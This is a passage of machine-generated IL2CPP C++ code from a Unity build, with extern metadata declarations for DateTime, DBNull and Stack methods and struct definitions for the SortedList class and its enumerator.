DBNull_System_IConvertible_ToSingle_m83559328EDDA097F34DE62755E9014D5DC226435_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToType_m6DE5E30330953145F76EF4BC8C8446C61FFB5E6D_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToUInt16_mB4DFF398A4EB0E54E2CD632E9728D7162DA7A5EB_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToUInt32_m4CFFCFF1F58EE869C907CC5A2C2421034A628B81_MetadataUsageId; extern const uint32_t DBNull_System_IConvertible_ToUInt64_m0F1C8A9AF9BEE4E93FF637569D1A0A28F1C2C628_MetadataUsageId; extern const uint32_t DBNull_ToString_m57394DA26A502AAD19DBEAE045230CEB5F6FF236_MetadataUsageId; extern const uint32_t DBNull_ToString_mA97EAD399B15473466B66DEFB53FC261A00BE785_MetadataUsageId; extern const uint32_t DBNull__cctor_mC681597B5135AD25F2A598A96F2C7129C31283AE_MetadataUsageId; extern const uint32_t DBNull__ctor_m65FBEA4E461D29FD277A21BEAA693BD11DF7D3C9_MetadataUsageId; extern const uint32_t DateTimeFormat_ExpandPredefinedFormat_m61BDA6D452DFDB96A8CB7369474886DE29C5395A_MetadataUsageId; extern const uint32_t DateTimeFormat_FormatCustomizedRoundripTimeZone_mDCF0536EFD8B9E6DD2E794237D72D9C939099AC7_MetadataUsageId; extern const uint32_t DateTimeFormat_FormatCustomizedTimeZone_m31043AD6F2795436AB56520F2689E3E0DDA5C685_MetadataUsageId; extern const uint32_t DateTimeFormat_FormatCustomized_mB01ABBA7E73E58981F9742722B2CD39DDBBCA619_MetadataUsageId; extern const uint32_t DateTimeFormat_FormatDigits_m26B4143174A9FCEFF5DE1BD1DA78EE75F0A12B53_MetadataUsageId; extern const uint32_t DateTimeFormat_Format_m3324809CE00998580E953F539E93153ADBB8447A_MetadataUsageId; extern const uint32_t DateTimeFormat_Format_mA965A0AFBC1F2DA20C56B16652515CB08F515CFC_MetadataUsageId; extern const uint32_t DateTimeFormat_GetRealFormat_mAAA9091BEC0C4473B1D7377152247CEFD2BC4ED0_MetadataUsageId; extern const uint32_t DateTimeFormat_HebrewFormatDigits_m89657AAA5FF4AC8C0E6D490BA0DD98DF2F92AEBC_MetadataUsageId; extern const uint32_t DateTimeFormat_ParseQuoteString_m0B491849EDF980D33DC51E7C756D244FF831CA60_MetadataUsageId; extern const uint32_t DateTimeFormat__cctor_m767ECD160CF93F838EF10AF7C197BF3002A39D34_MetadataUsageId; extern const uint32_t DateTimeParse_AdjustTimeZoneToLocal_mF11CDF50F3F7BA7B4E9B367D992B10736DBD264D_MetadataUsageId; extern const uint32_t DateTimeParse_AdjustTimeZoneToUniversal_mD183D3A35914ABCE48BE302A3D183882D66AE393_MetadataUsageId; extern const uint32_t DateTimeParse_CheckDefaultDateTime_mE0B8DBAE34A78D6A4E4B7FA6660929CA67EB3478_MetadataUsageId; extern const uint32_t DateTimeParse_CheckNewValue_m32110E5182DD4B3049F8F7539A5990621FA9C988_MetadataUsageId; extern const uint32_t DateTimeParse_DateTimeOffsetTimeZonePostProcessing_m15829B176BF4A494CB94C200B51506EC9522DF80_MetadataUsageId; extern const uint32_t DateTimeParse_DetermineTimeZoneAdjustments_mE29DEB6454825DC2B53BB17FE5268DFC8BA007C6_MetadataUsageId; extern const uint32_t DateTimeParse_DoStrictParse_m404C0A9C38726E4B07EE689493F4BAFBEEA50E15_MetadataUsageId; extern const uint32_t DateTimeParse_ExpandPredefinedFormat_m87CF9E69CC8E52C3D20A55D52FD3DFBBAAC1A44F_MetadataUsageId; extern const uint32_t DateTimeParse_GetDateOfDSN_m391AABD326E77DA46D71FE1ACCF1C8FCABA4824C_MetadataUsageId; extern const uint32_t DateTimeParse_GetDateOfNDS_m66C24ADF6167A1B0779C0436ED3CBCD602EBEBBB_MetadataUsageId; extern const uint32_t DateTimeParse_GetDateOfNNDS_m1390DC4CE0E6333945D7BD08F124AA0415A700B6_MetadataUsageId; extern const uint32_t DateTimeParse_GetDateTimeNow_mBAF702F1D6A3F954D2520AD7B01FCA0F159DD759_MetadataUsageId; extern const uint32_t DateTimeParse_GetDateTimeParseException_m26091CD2EBBFFEA867F71D3910742714FF38F733_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfMNN_m7D023A76508B02690AA381F1808836EFC86B3374_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfMN_mA62FE28EDFF83EFD1466C867547B576DC8E68620_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfNM_mB0820186EBFA26130280E286785383C03A8C7277_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfNNN_m7DC4B139DB3853458A7854D87E5B9527E0E08E56_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfNNY_mD619397E2B7F801D2F569CA91D5878742C2FD825_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfNN_m98D15515975E0B06429DEDCAF14D3083001ADCA0_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfYMN_m2E7DC88AEE18C162381DCC0F93043848A21B8B74_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfYM_m7ED25D38684B48D3985BF08AA31115253AF47805_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfYNN_m60CC9772F4E33623D3ADA795C58851E23EA490E7_MetadataUsageId; extern const uint32_t DateTimeParse_GetDayOfYN_m0AE142EC90410897271ECB3ACBA4D62466DF5436_MetadataUsageId; extern const uint32_t DateTimeParse_GetDefaultYear_m6AA53857838C682DF0D947E1E22502A2888FAC83_MetadataUsageId; extern const uint32_t DateTimeParse_GetHebrewDayOfNM_m4F9314601978E136AD77DBC5D9434C5D360A67FC_MetadataUsageId; extern const uint32_t DateTimeParse_GetTimeOfNNN_m59D4D7BB0B637B9E549B9F91C0D7B96EE25BEABF_MetadataUsageId; extern const uint32_t DateTimeParse_GetTimeOfNN_m8F29F972206C71BAA5EB4721AB5CAC6ACC987A02_MetadataUsageId; extern const uint32_t DateTimeParse_GetTimeOfN_m4240DB94AC85D67E2F15D3E01695908C5EF94075_MetadataUsageId; extern const uint32_t DateTimeParse_GetTimeZoneName_m97D930C9A69DF1FF85F761CEBB5025A04360FEAD_MetadataUsageId; extern const uint32_t DateTimeParse_HandleTimeZone_mA7F93EC5CC7B120970BA0CF78CA0CB5803BEB4CD_MetadataUsageId; extern const uint32_t DateTimeParse_Lex_mE8D565FF95FF14B4575857D9DF4056AC92AB4622_MetadataUsageId; extern const uint32_t DateTimeParse_MatchHebrewDigits_mAE589497302D66173A915086EFA3D4523966822E_MetadataUsageId; extern const uint32_t DateTimeParse_MatchWord_mC620454975484A06318A4488BA503D763B98EE34_MetadataUsageId; extern const uint32_t DateTimeParse_ParseByFormat_mA0F5500F7D2A3FF7BD1862671B4A12A0E9F66E30_MetadataUsageId; extern const uint32_t DateTimeParse_ParseDigits_m763A0B8E0D08787C82DDFD7EAE3F6B8B77BB2C02_MetadataUsageId; extern const uint32_t DateTimeParse_ParseExact_m53595CD96FF504A940A435D43F084A8BE08CBDCD_MetadataUsageId; extern const uint32_t DateTimeParse_ParseFractionExact_m476F7F83C40650B7BCA5511D184B1CBA207A95AB_MetadataUsageId; extern const uint32_t DateTimeParse_ParseFraction_m50CDFE8D39EA1BF918ECEBE6E31E099B80F17B55_MetadataUsageId; extern const uint32_t DateTimeParse_ParseISO8601_mC6C5A03B75BD943D6CC59E696B0AC2641E1C0C96_MetadataUsageId; extern const uint32_t DateTimeParse_ParseTimeZoneOffset_mA4E0AC9488ACC70C3CD71335F183CE5F9CB86D28_MetadataUsageId; extern const uint32_t DateTimeParse_Parse_m452E56D26BB4E9A3450434A55F0C7046124BC62A_MetadataUsageId; extern const uint32_t DateTimeParse_ProcessHebrewTerminalState_m1D9D4E8A87FFACE53E9313F6A469620E24FA573D_MetadataUsageId; extern const uint32_t DateTimeParse_ProcessTerminaltState_mDEE6B5911737D96C89B9AA5749F4A8CB86EA838D_MetadataUsageId; extern const uint32_t DateTimeParse_SetDateDMY_m7EF8C6A06954821541C20B6780EAF704329CB324_MetadataUsageId; extern const uint32_t DateTimeParse_SetDateMDY_m15C5D980488D64E3A673443F6382D89F4B52DA7E_MetadataUsageId; extern const uint32_t DateTimeParse_SetDateYDM_m06145EDE4B01E360FD3416E70F72CE50746F2CCE_MetadataUsageId; extern const uint32_t DateTimeParse_TryAdjustYear_mE9AD0E5B4C556961411058595C6E34DA9497C43C_MetadataUsageId; extern const uint32_t DateTimeParse_TryParseExact_m3A1B2D674B4C6AA4F1768B10FCF311D54006DFDE_MetadataUsageId; extern const uint32_t DateTimeParse_TryParse_m007A28D9FA0561EB92C3DD2D22D293980E15DBB0_MetadataUsageId; extern const uint32_t DateTimeParse_VerifyValidPunctuation_m299ECDE17C72C83E5CE0D00DE1AB48930634DE99_MetadataUsageId; extern const uint32_t DateTimeParse__cctor_m54E56E6CC8F71DAD2091E80C571ECD977998F445_MetadataUsageId; extern const uint32_t DateTime_AddMonths_mFACFF352D9DFA0D4B3AC47BFFEA0564F163D7AEC_MetadataUsageId; extern const uint32_t DateTime_AddTicks_m0FAD7AE5AEAF9DB974BBA46C0749163DD9DD0AA5_MetadataUsageId; extern const uint32_t DateTime_AddYears_m4D66AFB61758D852CEEFE29D103C88106C6847A2_MetadataUsageId; extern const uint32_t DateTime_Add_mC05E213CD5FC31C6AA98BB0B741EF319A0142524_MetadataUsageId; extern const uint32_t DateTime_CompareTo_mC233DDAE807A48EE6895CC09CE22E111E506D08C_MetadataUsageId; extern const uint32_t DateTime_DateToTicks_m8315FA4947393A7ABDB9A9905EE6B0F11ECC6A64_MetadataUsageId; extern const uint32_t DateTime_DaysInMonth_mE979D12858E0D6CC14576D283B5AB66AA53B9F90_MetadataUsageId; extern const uint32_t DateTime_Equals_m85006DF1EA5B2B7EAB4BEFA643B5683B0BDBE4AB_MetadataUsageId; extern const uint32_t DateTime_FromBinaryRaw_m62E01B6FBD437260699D149A18C00CA49B793A5F_MetadataUsageId; extern const uint32_t DateTime_FromBinary_m5A34F3CF87443A48B220F77B685C35B8A534E973_MetadataUsageId; extern const uint32_t DateTime_GetDatePart_m228B8E3A744BBCF0A8BB5F8FA470532FF09CCC41_MetadataUsageId; extern const uint32_t DateTime_IsLeapYear_m973908BB0519EEB99F34E6FCE5774ABF72E8ACF7_MetadataUsageId; extern const uint32_t DateTime_ParseExact_mF45E615EBCC82CA967D4BC7838EE570508D0F97F_MetadataUsageId; extern const uint32_t DateTime_Parse_mFB11F5C0061CEAD9A2F51E3814DEBE0475F2BA37_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToBoolean_mF3E8C8165EF5EFB4FAC81A5FC42C6D43CBBE4A43_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToByte_m5E09EBD1927AD26BC9589F68260366A3B926D01F_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToChar_mB13617F47244C7D6244E2C2428446C400212F859_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToDecimal_mB7DCD14BFB253B7CD70733AA9E58FA2824D508F3_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToDouble_m4E342FDC428CF2B3F3E634A2C583DE8350BC7075_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToInt16_m93FA9B75E4EEAD2756A271E0E3C6FB041A98C75E_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToInt32_m494AB8F54DE9983726AD984DAB9AC41F9BE3EDDF_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToInt64_m37AB85D1F73721D2C30274B8008564637435E03B_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToSByte_m0577A0A1C226A26F0C92B65A7A3642E58C718078_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToSingle_m5AA2E27FE6580FA36530B9475A80DF43BFEF8B90_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToType_m1CB32A2D30BF107AC583ABF3E4FA778A7955DAE5_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToUInt16_m86FFF72766A8C70F9099DEE61111D3E0B9FC618D_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToUInt32_mBC2307EA9BC8BDD1CA4D83FF93036F6361D3390B_MetadataUsageId; extern const uint32_t DateTime_System_IConvertible_ToUInt64_mD79A0DAD19E8DA50E102E48A793FD0BA9F0DC34E_MetadataUsageId; extern const uint32_t DateTime_System_Runtime_Serialization_ISerializable_GetObjectData_m6DDB58B228D00F832D1670A52C6217973595CFA6_MetadataUsageId; extern const uint32_t DateTime_TimeToTicks_m38671AD5E9A1A1DE63AF5BAC980B0A0E8E67A5DB_MetadataUsageId; extern const uint32_t DateTime_ToString_m30D2730D4AB64F21D73E2037237150FC5B00F0C8_MetadataUsageId; extern const uint32_t DateTime_ToString_m9943D2AB36F33BA0A4CF44DAE32D5944E2561B1C_MetadataUsageId; extern const uint32_t DateTime_ToString_mBB245CB189C10659D35E8E273FB03E34EA1A7122_MetadataUsageId; extern const uint32_t DateTime_TryCreate_m66B150DF90CE2A1C9658A034DE7964EE44F5D58A_MetadataUsageId; extern const uint32_t DateTime__cctor_mE95C20EB1DD6B449472701E37D593FBF224E3D58_MetadataUsageId; extern const uint32_t DateTime__ctor_m027A935E14EB81BCC0739BD56AE60CDE3387990C_MetadataUsageId; extern const uint32_t DateTime__ctor_m184FABF75B3C703A70200D760A7E43C60524630F_MetadataUsageId; extern const uint32_t DateTime__ctor_m399F434D85D918405F74C5B04BCBD8C1B410F10E_MetadataUsageId; extern const uint32_t DateTime__ctor_m6567CDEB97E6541CE4AF8ADDC617CFF419D5A58E_MetadataUsageId; extern const uint32_t DateTime__ctor_m8946C6F0EFB7933840C449A2C859B08101393A84_MetadataUsageId; extern const uint32_t DateTime__ctor_mF4506D7FF3B64F7EC739A36667DC8BC089A6539A_MetadataUsageId; extern const uint32_t DateTime_get_Now_mB464D30F15C97069F92C1F910DCDDC3DFCC7F7D2_MetadataUsageId; extern const uint32_t DateTime_get_UtcNow_m171F52F4B3A213E4BAD7B78DC8E794A269DE38A1_MetadataUsageId; extern const uint32_t DateTime_op_Addition_m6CE7A79B6E219E67A75AB17545D1873529262282_MetadataUsageId; extern const uint32_t DateTime_op_Subtraction_m679BBE02927C8538BBDD10A514E655568246830B_MetadataUsageId; extern const uint32_t SortedListEnumerator_MoveNext_m9E4024F4C87D1FE851B86685062E1EB389D56266_MetadataUsageId; extern const uint32_t SortedListEnumerator_Reset_mA0ACBEBFF0955F4BF3B6CA08C028361AE993C1A4_MetadataUsageId; extern const uint32_t SortedListEnumerator_get_Current_mD1C66071084DE980DC97EABCE7BFBCCF96066120_MetadataUsageId; extern const uint32_t SortedListEnumerator_get_Entry_mEDCBB15F075D7D79709D37B9EB395F39252C253E_MetadataUsageId; extern const uint32_t SortedListEnumerator_get_Key_mDE6E5D038A0212BB14DCBB9D73F831233EAC826E_MetadataUsageId; extern const uint32_t SortedListEnumerator_get_Value_mA1FF92895EE42234163A72D61DA3D6CF6C642C14_MetadataUsageId; extern const uint32_t StackEnumerator_MoveNext_m7C00619A440FB2C12C0A5C3C8CEB934250C3DE22_MetadataUsageId; extern const uint32_t StackEnumerator_Reset_m72AB015F4BB163EC9DC19457743EF309A4C24187_MetadataUsageId; extern const uint32_t StackEnumerator_get_Current_m648842035EE50845BF314430E0FFBF33A4983C22_MetadataUsageId; extern const uint32_t Stack_Clone_m970E7DDDA2100E11F01BF22FDC51B59A0058BB65_MetadataUsageId; extern const uint32_t Stack_CopyTo_mFE62429D1F2E385D31D8AFEE165327B33628BDF4_MetadataUsageId; extern const uint32_t Stack_GetEnumerator_m58A7F61531021CA2F3BF52854236229EB85F6E92_MetadataUsageId; extern const uint32_t Stack_Peek_mEAC45FC37790CF917154F27345E106C2EE38346C_MetadataUsageId; extern const uint32_t Stack_Pop_m5419FBFC126E7004A81612F90B8137C5629F7CDE_MetadataUsageId; extern const uint32_t Stack_Push_m971376A29407806EA49448EBDF6DECCCE8AF6358_MetadataUsageId; extern const uint32_t Stack__ctor_m98F99FFBF373762F139506711349267D5354FE08_MetadataUsageId; extern const uint32_t Stack__ctor_mAA16105AE32299FABCBCCB6D912C220816030193_MetadataUsageId; extern const uint32_t Stack_get_SyncRoot_mD2CA98A101E2F7EF48457FA8496700E438054EB6_MetadataUsageId; extern const uint32_t WindowsCancelHandler_BeginInvoke_m81C599A998316D97045F021332275532AFFBAB2D_MetadataUsageId; extern const uint32_t WindowsConsole_DoWindowsConsoleCancelEvent_m4FAC7A4ADAFBDC6AACB88F9B38FCA6511BC79627_MetadataUsageId; extern const uint32_t WindowsConsole_GetInputCodePage_m492EDD139F7E66A90971A069FA4DD63000F77B4F_MetadataUsageId; extern const uint32_t WindowsConsole_GetOutputCodePage_mAF546B0FBC6558F7F2636A86E8733AD4AD2C4DE3_MetadataUsageId; extern const uint32_t WindowsConsole__cctor_m5F32EAD6176EB9FCC8E4BF9E34FCA25348324BB9_MetadataUsageId; struct CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD_marshaled_com; struct CultureData_tF43B080FFA6EB278F4F289BCDA3FB74B6C208ECD_marshaled_pinvoke; struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_com; struct CultureInfo_t345AC6924134F039ED9A11F3E03F8E91B6A3225F_marshaled_pinvoke; struct Exception_t_marshaled_com; struct Exception_t_marshaled_pinvoke; struct ByteU5BU5D_tD06FDBE8142446525DF1C40351D523A228373821; struct CharU5BU5D_t4CC6ABF0AD71BEC97E3C2F1E9C5677E46D3A75C2; struct DSU5BU5D_tD2C97A748C0C21D33CB1C2FA88D5C40A4B7C5A4E; struct DSU5BU5DU5BU5D_tBF6820D6413EE8416ADBB7431D0A39B3F1A33FD1; struct DelegateU5BU5D_tDFCDEE2A6322F96C0FE49AF47E9ADB8C4B294E86; struct Int32U5BU5D_t2B9E4FDDDB9F0A00EC0AC631BA2DA915EB1ECF83; struct Int64U5BU5D_tE04A3DEF6AF1C852A43B98A24EFB715806B37F5F; struct ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A; struct RuntimeTypeU5BU5D_tD8ADAF35960AACE7B524A8DDF0CEAC7D151161FE; struct StringU5BU5D_t933FB07893230EA91C40FF900D5400665E87B14E; #ifndef RUNTIMEOBJECT_H #define RUNTIMEOBJECT_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Object #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMEOBJECT_H struct Il2CppArrayBounds; #ifndef RUNTIMEARRAY_H #define RUNTIMEARRAY_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Array #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // RUNTIMEARRAY_H #ifndef ATTRIBUTE_TF048C13FB3C8CFCC53F82290E4A3F621089F9A74_H #define ATTRIBUTE_TF048C13FB3C8CFCC53F82290E4A3F621089F9A74_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Attribute struct Attribute_tF048C13FB3C8CFCC53F82290E4A3F621089F9A74 : public RuntimeObject { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // ATTRIBUTE_TF048C13FB3C8CFCC53F82290E4A3F621089F9A74_H #ifndef SORTEDLIST_TC8B7CDE75652EC657C510034F127B9DFDE16BF4E_H #define SORTEDLIST_TC8B7CDE75652EC657C510034F127B9DFDE16BF4E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.SortedList struct SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E : public RuntimeObject { public: // System.Object[] System.Collections.SortedList::keys ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___keys_0; // System.Object[] System.Collections.SortedList::values ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___values_1; // System.Int32 System.Collections.SortedList::_size int32_t ____size_2; // System.Int32 System.Collections.SortedList::version int32_t ___version_3; // System.Collections.IComparer System.Collections.SortedList::comparer RuntimeObject* ___comparer_4; // System.Object System.Collections.SortedList::_syncRoot RuntimeObject * ____syncRoot_5; public: inline static int32_t get_offset_of_keys_0() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ___keys_0)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get_keys_0() const { return ___keys_0; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of_keys_0() { return &___keys_0; } inline void set_keys_0(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ___keys_0 = value; Il2CppCodeGenWriteBarrier((&___keys_0), value); } inline static int32_t get_offset_of_values_1() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ___values_1)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get_values_1() const { return ___values_1; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of_values_1() { return &___values_1; } inline void set_values_1(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ___values_1 = value; Il2CppCodeGenWriteBarrier((&___values_1), value); } inline static int32_t get_offset_of__size_2() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ____size_2)); } inline int32_t get__size_2() const { return ____size_2; } inline int32_t* get_address_of__size_2() { return &____size_2; } inline void set__size_2(int32_t value) { ____size_2 = value; } inline static int32_t get_offset_of_version_3() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ___version_3)); } inline int32_t get_version_3() const { return ___version_3; } inline int32_t* get_address_of_version_3() { return &___version_3; } inline void set_version_3(int32_t value) { ___version_3 = value; } inline static int32_t get_offset_of_comparer_4() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ___comparer_4)); } inline RuntimeObject* get_comparer_4() const { return ___comparer_4; } inline RuntimeObject** get_address_of_comparer_4() { return &___comparer_4; } inline void set_comparer_4(RuntimeObject* value) { ___comparer_4 = value; Il2CppCodeGenWriteBarrier((&___comparer_4), value); } inline static int32_t get_offset_of__syncRoot_5() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E, ____syncRoot_5)); } inline RuntimeObject * get__syncRoot_5() const { return ____syncRoot_5; } inline RuntimeObject ** get_address_of__syncRoot_5() { return &____syncRoot_5; } inline void set__syncRoot_5(RuntimeObject * value) { ____syncRoot_5 = value; Il2CppCodeGenWriteBarrier((&____syncRoot_5), value); } }; struct SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E_StaticFields { public: // System.Object[] System.Collections.SortedList::emptyArray ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* ___emptyArray_6; public: inline static int32_t get_offset_of_emptyArray_6() { return static_cast<int32_t>(offsetof(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E_StaticFields, ___emptyArray_6)); } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* get_emptyArray_6() const { return ___emptyArray_6; } inline ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A** get_address_of_emptyArray_6() { return &___emptyArray_6; } inline void set_emptyArray_6(ObjectU5BU5D_t3C9242B5C88A48B2A5BD9FDA6CD0024E792AF08A* value) { ___emptyArray_6 = value; Il2CppCodeGenWriteBarrier((&___emptyArray_6), value); } }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SORTEDLIST_TC8B7CDE75652EC657C510034F127B9DFDE16BF4E_H #ifndef SORTEDLISTDEBUGVIEW_T685B663AA79F56A8B544B3E77D59D21B816440E7_H #define SORTEDLISTDEBUGVIEW_T685B663AA79F56A8B544B3E77D59D21B816440E7_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.SortedList/SortedListDebugView struct SortedListDebugView_t685B663AA79F56A8B544B3E77D59D21B816440E7 : public RuntimeObject { public: public: }; #ifdef __clang__ #pragma clang diagnostic pop #endif #endif // SORTEDLISTDEBUGVIEW_T685B663AA79F56A8B544B3E77D59D21B816440E7_H #ifndef SORTEDLISTENUMERATOR_T0B3C08255F72412FF007E1CEBA45EEFAED17443E_H #define SORTEDLISTENUMERATOR_T0B3C08255F72412FF007E1CEBA45EEFAED17443E_H #ifdef __clang__ #pragma clang diagnostic push #pragma clang diagnostic ignored "-Winvalid-offsetof" #pragma clang diagnostic ignored "-Wunused-variable" #endif // System.Collections.SortedList/SortedListEnumerator struct SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E : public RuntimeObject { public: // System.Collections.SortedList System.Collections.SortedList/SortedListEnumerator::sortedList SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * ___sortedList_0; // System.Object System.Collections.SortedList/SortedListEnumerator::key RuntimeObject * ___key_1; // System.Object System.Collections.SortedList/SortedListEnumerator::value RuntimeObject * ___value_2; // System.Int32 System.Collections.SortedList/SortedListEnumerator::index int32_t ___index_3; // System.Int32 System.Collections.SortedList/SortedListEnumerator::startIndex int32_t ___startIndex_4; // System.Int32 System.Collections.SortedList/SortedListEnumerator::endIndex int32_t ___endIndex_5; // System.Int32 System.Collections.SortedList/SortedListEnumerator::version int32_t ___version_6; // System.Boolean System.Collections.SortedList/SortedListEnumerator::current bool ___current_7; // System.Int32 System.Collections.SortedList/SortedListEnumerator::getObjectRetType int32_t ___getObjectRetType_8; public: inline static int32_t get_offset_of_sortedList_0() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___sortedList_0)); } inline SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * get_sortedList_0() const { return ___sortedList_0; } inline SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E ** get_address_of_sortedList_0() { return &___sortedList_0; } inline void set_sortedList_0(SortedList_tC8B7CDE75652EC657C510034F127B9DFDE16BF4E * value) { ___sortedList_0 = value; Il2CppCodeGenWriteBarrier((&___sortedList_0), value); } inline static int32_t get_offset_of_key_1() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___key_1)); } inline RuntimeObject * get_key_1() const { return ___key_1; } inline RuntimeObject ** get_address_of_key_1() { return &___key_1; } inline void set_key_1(RuntimeObject * value) { ___key_1 = value; Il2CppCodeGenWriteBarrier((&___key_1), value); } inline static int32_t get_offset_of_value_2() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___value_2)); } inline RuntimeObject * get_value_2() const { return ___value_2; } inline RuntimeObject ** get_address_of_value_2() { return &___value_2; } inline void set_value_2(RuntimeObject * value) { ___value_2 = value; Il2CppCodeGenWriteBarrier((&___value_2), value); } inline static int32_t get_offset_of_index_3() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___index_3)); } inline int32_t get_index_3() const { return ___index_3; } inline int32_t* get_address_of_index_3() { return &___index_3; } inline void set_index_3(int32_t value) { ___index_3 = value; } inline static int32_t get_offset_of_startIndex_4() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___startIndex_4)); } inline int32_t get_startIndex_4() const { return ___startIndex_4; } inline int32_t* get_address_of_startIndex_4() { return &___startIndex_4; } inline void set_startIndex_4(int32_t value) { ___startIndex_4 = value; } inline static int32_t get_offset_of_endIndex_5() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___endIndex_5)); } inline int32_t get_endIndex_5() const { return ___endIndex_5; } inline int32_t* get_address_of_endIndex_5() { return &___endIndex_5; } inline void set_endIndex_5(int32_t value) { ___endIndex_5 = value; } inline static int32_t get_offset_of_version_6() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___version_6)); } inline int32_t get_version_6() const { return ___version_6; } inline int32_t* get_address_of_version_6() { return &___version_6; } inline void set_version_6(int32_t value) { ___version_6 = value; } inline static int32_t get_offset_of_current_7() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___current_7)); } inline bool get_current_7() const { return ___current_7; } inline bool* get_address_of_current_7() { return &___current_7; } inline void set_current_7(bool value) { ___current_7 = value; } inline static int32_t get_offset_of_getObjectRetType_8() { return static_cast<int32_t>(offsetof(SortedListEnumerator_t0B3C08255F72412FF007E1CEBA45EEFAED17443E, ___getObjectRetType_8)); } inline int32_t get_getObjectRetType_8() const { return ___getObjectRetType_8; } inline int32_t* get_address_of_getObjectRetType_8() { return &___getObjectRetType_8; } inline void set_getObjectRetType_8(int32_t value) { ___getObjectRetType_8 = value; } }; #ifdef 